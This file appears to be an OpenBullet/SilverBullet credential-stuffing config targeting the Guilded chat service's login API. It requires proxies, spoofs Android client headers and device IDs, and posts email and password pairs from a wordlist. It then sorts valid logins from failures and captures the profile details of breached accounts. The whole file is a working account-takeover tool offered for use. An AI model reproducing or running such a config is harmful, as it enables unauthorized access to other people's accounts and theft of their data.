[SETTINGS]
{
  "Name": "Guilded Android API Config",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-13T11:52:48.3607271+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Guilded Android API Config",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GenerateGUID -> VAR "GUID" 

FUNCTION RandomString "c?d?d?d?d?d?d?dc?d?d?df?dc?d" -> VAR "DEVICEID" 

REQUEST POST "https://www.guilded.gg/api/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: application/json" 
  HEADER "guilded-client-id: <GUID>" 
  HEADER "guilded-device-id: <DEVICEID>" 
  HEADER "guilded-nonprod-waf-pw: null" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: www.guilded.gg" 
  HEADER "Connection: Keep-Alive" 
  HEADER "User-Agent: okhttp/3.12.12" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 55" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email or password is incorrect." 
    KEY "Email not found." 
  KEYCHAIN Success OR 
    KEY "id" 

PARSE "<SOURCE>" LR "\"name\":\"" "\"," CreateEmpty=FALSE -> CAP "NAME" 

PARSE "<SOURCE>" LR ",\"joinDate\":\"" "\",\"" CreateEmpty=FALSE -> CAP "JOIN DATE" 

PARSE "<SOURCE>" LR "\"lastOnline\":\"" "\"" CreateEmpty=FALSE -> CAP "LAST ACTIVE" 

PARSE "<SOURCE>" LR "{\"bio\":\"" ",\"" CreateEmpty=FALSE -> CAP "ABOUT" 

PARSE "<SOURCE>" LR "\"tagLine\":\"" "\"" CreateEmpty=FALSE -> CAP "TAG LINE" 

PARSE "<SOURCE>" LR "\"type\":\"" "\"," CreateEmpty=FALSE -> CAP "TYPE" 

